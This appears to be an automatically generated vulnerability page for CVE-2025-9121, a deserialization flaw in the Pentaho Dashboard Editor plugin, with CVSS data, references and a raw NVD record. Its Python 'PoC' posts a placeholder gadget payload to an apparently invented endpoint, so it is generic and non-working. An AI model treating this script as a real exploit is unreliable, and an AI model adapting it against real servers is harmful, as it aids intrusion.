CVE-2025-9121

Description

Pentaho Data Integration and Analytics Community Dashboard Editor plugin versions before 10.2.0.4, including 9.3.0.x and 8.3.x, deserialize untrusted JSON data without constraining the parser to approved classes and methods.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pentaho Community Dashboard Editor plugin < 10.2.0.4

Pentaho Community Dashboard Editor plugin 9.3.0.x

Pentaho Community Dashboard Editor plugin 8.3.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import json
import requests
import base64

# CVE-2025-9121 PoC - Unsafe Deserialization in Pentaho Dashboard Editor
# This PoC demonstrates how an attacker could exploit the deserialization vulnerability
# by sending a malicious serialized payload

TARGET_URL = "http://target-server:8080/pentaho/plugin/dashboard-editor/api/deserialize"

# Example malicious serialized object (gadget chain payload)
# In real attack, this would be a ysoserial-style payload
MALICIOUS_PAYLOAD = {
    "action": "deserialize",
    "data": "base64_encoded_serialized_object_here",
    "classType": "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"
}

def exploit(target_url, payload):
    """
    Send malicious deserialization payload to vulnerable endpoint
    """
    headers = {
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=30)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2025-9121 PoC - Pentaho Unsafe Deserialization")
    print("Target: ", TARGET_URL)
    exploit(TARGET_URL, MALICIOUS_PAYLOAD)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9121
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9121
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9121/
[4] VulDB https://vuldb.com/cve/CVE-2025-9121
[5] https://support.pentaho.com/hc/en-us/articles/41832536185613--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Deserialization-of-Untrusted-Data-Versions-before-10-2-0-4-Impacted-CVE-2025-9121

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9121", "sourceIdentifier": "[email protected]", "published": "2025-12-15T23:15:57.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pentaho Data Integration and Analytics Community Dashboard Editor plugin versions before 10.2.0.4, including 9.3.0.x and 8.3.x, deserialize untrusted JSON data without constraining the parser to approved classes and methods."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://support.pentaho.com/hc/en-us/articles/41832536185613--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Deserialization-of-Untrusted-Data-Versions-before-10-2-0-4-Impacted-CVE-2025-9121", "source": "[email protected]"}]}}